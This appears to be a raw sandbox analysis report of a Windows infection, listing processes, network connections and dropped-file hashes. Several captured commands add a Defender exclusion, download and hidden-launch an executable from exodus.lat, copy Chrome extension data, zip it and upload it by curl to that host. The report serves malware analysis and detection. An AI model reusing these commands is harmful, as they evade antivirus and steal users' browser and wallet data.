"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1d14ac5-2ae0-46c0-80a9-03b4a52df213} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cbc78e4-8af5-4fe4-aa5e-f44cb4af871f} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3004 -childID 1 -isForBrowser -prefsHandle 2648 -prefMapHandle 2980 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c4bc19-b4de-42d2-bb9d-c61552719f82} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3792 -childID 2 -isForBrowser -prefsHandle 3784 -prefMapHandle 3780 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4eca05ad-b6dd-4af0-89e8-3c70b278bb7b} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4532 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4480 -prefMapHandle 4520 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4091d21a-8e19-41ef-bb46-5fab5a515c15} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4976 -childID 3 -isForBrowser -prefsHandle 4968 -prefMapHandle 4964 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e97cb531-2a79-42df-b006-c4e0a8ba0d4a} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5224 -childID 4 -isForBrowser -prefsHandle 5216 -prefMapHandle 5204 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e4edf6d-e616-46e8-bb0c-9f45ebd3ef4a} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 5 -isForBrowser -prefsHandle 5436 -prefMapHandle 5356 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6dc23d4-5f75-4137-94ae-963d5b0874fa} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe"

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 221.197.63.92.in-addr.arpa udp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 142.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.21.88.210:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 covery-mover.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 74.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 186.58.21.104.in-addr.arpa udp
US 8.8.8.8:53 210.88.21.104.in-addr.arpa udp
US 8.8.8.8:53 print-vexer.biz udp
US 172.67.181.192:443 print-vexer.biz tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 156.43.21.104.in-addr.arpa udp
US 8.8.8.8:53 192.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 83.106.226.44.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
N/A 127.0.0.1:59481 tcp
N/A 127.0.0.1:59489 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 211.38.74.45.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 209.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 cdn-downloads.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.35:80 c.pki.goog tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 104.91.71.89:80 r11.o.lencr.org tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 89.71.91.104.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com udp

Files

memory/4776-0-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/4776-1-0x0000000077464000-0x0000000077466000-memory.dmp

memory/4776-2-0x0000000000C31000-0x0000000000C5F000-memory.dmp

memory/4776-3-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/4776-4-0x0000000000C30000-0x00000000010F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 cd86e4c2fbaf81cb17606d69108fff47
SHA1 97117dadf1a95214ceaf1d1d9337dae317c6a358
SHA256 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
SHA512 42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748

memory/4776-15-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/2628-16-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-19-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-18-0x0000000000C81000-0x0000000000CAF000-memory.dmp

memory/2628-20-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-21-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-22-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-24-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-25-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-26-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-28-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-29-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-30-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-31-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

memory/116-390-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/2628-426-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/3024-443-0x0000000000B40000-0x0000000000FCC000-memory.dmp

memory/116-447-0x0000000010000000-0x000000001001C000-memory.dmp

memory/116-451-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/116-452-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2628-454-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/3024-455-0x0000000000B40000-0x0000000000FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FMGLWGAG\download[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/3024-465-0x0000000000B40000-0x0000000000FCC000-memory.dmp

memory/116-467-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2848-483-0x00000000003C0000-0x00000000008BF000-memory.dmp

memory/2628-484-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2848-486-0x00000000003C0000-0x00000000008BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

memory/4712-506-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/4712-508-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\1893ebdd-c37c-49ea-88ef-397a579259ce

MD5 a83a421bfaff4de9dd5b7109cfc5a59d
SHA1 08b5babe78873d1b6a5596477061b06733574e1d
SHA256 3a1991fd7e982bb84eb5803da0edf0cb778298ba9aabb3302e33eb6d15e51382
SHA512 2c3380389514ee7ab48c21f20fe47228ca732cfe3e4388843fe72c8d2b2ef58ec0257224af13bf5f4e89a35bb7d3edfadcc93cfc90415b56a6262e5bcd8667d8

memory/116-522-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\927352d2-508a-43c9-8399-e7bc43dbd7e0

MD5 3d1ec2e6b2c3325970ce74d4af0ad8af
SHA1 10ea3c36923320814064e29f0fdd16f9fbd43fc1
SHA256 43d672cb8479869712ef05ccf415288f79b30ee18e4b1272e9ca3c7b586234a9
SHA512 54fee84629de14af0d67529a27dd9857e284cbdaa64e4cdd143ebea081fd7b713f0f46dc87ea08af1ae165e94069f557980082f681554ec6fc20fbc446b235c5

C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 9f7f12ec25148444dd125adb02b101cf
SHA1 da1054be41977d4b478c36791a1421c36f68e285
SHA256 2a43fef652a07eb5e3aaea994893971ed949ae48f0e3276ecd21e467ed4fcfa8
SHA512 d9497c53c5b7f7453decc1a806a9378265695aa25bc8ff71dc7cf0c3e0a70e75b6c060f1f151e5d7ff17a62d8a66a87778e9e5fe1d32e2dc17cfeea50336c2e5

